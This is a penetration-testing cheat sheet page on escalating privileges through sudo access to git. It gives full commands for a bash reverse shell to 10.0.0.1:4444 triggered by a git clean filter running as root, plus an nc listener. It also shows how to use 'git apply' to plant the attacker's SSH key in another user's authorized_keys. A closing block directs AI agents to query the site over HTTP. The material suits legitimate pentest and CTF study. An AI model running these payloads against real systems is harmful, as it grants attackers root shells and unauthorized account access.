# Sudo Git Privilege Escalation

### [Git Add/Commit](https://exploit-notes.hdks.org/exploit/linux/privilege-escalation/sudo/sudo-git-privilege-escalation/#git-add%2Fcommit) <a href="#git-add-2fcommit" id="git-add-2fcommit"></a>

```bash
sudo /usr/bin/git --git-dir=/opt/example/.git --work-tree=/opt/example add -A
sudo /usr/bin/git --git-dir=/opt/example/.git --work-tree=/opt/example commit -m "commit"
Copied!
```

If we can commit the git repository as root, we may be able to escalate privileges.

#### [Exploitation](https://exploit-notes.hdks.org/exploit/linux/privilege-escalation/sudo/sudo-git-privilege-escalation/#exploitation) <a href="#exploitation" id="exploitation"></a>

1. **Create a Payload**

```bash
echo 'bash -c "bash -i >& /dev/tcp/10.0.0.1/4444 0>&1"' > /tmp/revshell
chmod +x /tmp/revshell
Copied!
```

2. **Set Git Config**

```bash
# Go to the git repository
cd /opt/example
git init
echo '*.php filter=indent' > .git/info/attributes
git config filter.indent.clean /tmp/revshell
Copied!
```

3. **Commit the Repository**

Before committing, we need to start a listener in local machine.

```bash
nc -lvnp 4444
Copied!
```

Then commit with sudo.

```bash
sudo /usr/bin/git --git-dir=/opt/example/.git --work-tree=/opt/example add -A
sudo /usr/bin/git --git-dir=/opt/example/.git --work-tree=/opt/example commit -m "commit"
Copied!
```

Now we should get a shell in local terminal.

<br>

### [Git Apply](https://exploit-notes.hdks.org/exploit/linux/privilege-escalation/sudo/sudo-git-privilege-escalation/#git-apply) <a href="#git-apply" id="git-apply"></a>

```bash
sudo /usr/bin/git apply *
Copied!
```

If we can apply the patch for the git repository, we can update the content of arbitrary file.

#### [Exploitation with SSH Keys](https://exploit-notes.hdks.org/exploit/linux/privilege-escalation/sudo/sudo-git-privilege-escalation/#exploitation-with-ssh-keys) <a href="#exploitation-with-ssh-keys" id="exploitation-with-ssh-keys"></a>

Assume we are currently "user1" user then we want to escalate to be "user2".\
First we create a new SSH key.

```bash
cd /home/user1
ssh-keygen -t rsa
Enter file in which to save the key (/home/user1/.ssh/id_rsa): id_rsa
Copied!
```

New SSH keys (private/public) are generated under **`/home/user1`**.\
Next, add the content of **`id_rsa.pub`** into **`authorized_keys.`**.

```bash
cat /home/user1/id_rsa.pub > /home/user1/.ssh/authorized_keys
Copied!
```

Then create a patch.

```bash
cd /home
git diff user1/.bash_history user1/.ssh/authorized_keys > /tmp/patch
Copied!
```

After that, replace the name “user1” with “user2” in the patch file.

```bash
sed -i 's/user1/user2/g' /tmp/patch
Copied!
```

Now we can apply the patch as root. This command update the target user’s ("user2") **`authorization_keys`** to allow us to login with SSH key as "user2".

```bash
sudo /usr/bin/git apply /tmp/patch
ssh -i /home/user1/.ssh/id_rsa user2@example.com
```


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://morgan-bin-bash.gitbook.io/linux-privilege-escalation/sudo-git-privilege-escalation.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.